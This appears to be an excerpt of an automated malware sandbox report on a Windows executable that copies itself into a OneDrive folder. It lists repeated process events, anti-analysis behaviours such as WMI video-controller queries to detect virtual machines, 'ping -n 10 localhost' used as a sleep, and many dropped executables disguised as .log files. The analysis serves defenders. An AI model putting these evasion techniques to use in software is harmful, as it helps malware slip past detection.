                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Uses ping.exe to sleep
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeMemory allocated: B90000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeMemory allocated: 1A960000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 2C80000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1AE00000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1460000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1B2D0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 9B0000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1A750000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1790000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1B430000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 11A0000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1ABB0000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: A60000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1A650000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 2580000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1A6E0000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: DB0000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1A860000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1610000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeMemory allocated: 1B290000 memory reserve | memory write watch
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeCode function: 34_2_00007FFAAC82167B rdtsc 34_2_00007FFAAC82167B
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\LljRCdQC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\AWvLLWqc.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\tCqOXkyz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\YHFyVwyQ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\VggGSNtC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\UYcyJOZf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\GKfLNjlY.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\OqbZUiZT.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\CqTJEOHT.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\KFhcUPbS.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\QYBPfZgq.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\TraZorfO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\nimHpzUe.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\LWkTXfAf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\pafNrbGf.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\lgAYTQQj.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\mFCPuWEK.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\CnRDnDvx.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\abhXZtjw.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\olpMFKgz.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\rsUNXSTy.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\pqhfBjOC.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\sSNMOgTF.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\XOEIXFmQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\KPFv8ATDx0.exeDropped PE file which has not been started: C:\Users\user\Desktop\NqOhhczU.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\hxXYHhry.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\OgVBQDTo.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\JEwTrooN.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ACAUZvYN.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\xhGuwiIZ.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\CGsDyrOn.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\KpuBgggp.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\rlBOrtmg.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\IPEdAXAX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\LcQaEBDP.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\udSmiqlo.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ARClkDgk.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\rdSwMKLb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\RyZipATO.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\FCcCDjRB.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\gMZpSqzV.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\dSJhnlvh.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\ijuwfDOX.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\mBLWrFnw.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\VxlkbjYv.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\unoxMcqb.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\FTyBLKyM.logJump to dropped file
                            Source: C:\Users\jones\OneDrive\oqWNZWQNWoNnROlqjKcKhLM.exeDropped PE file which has not been started: C:\Users\user\Desktop\PthzQDco.logJump to dropped file
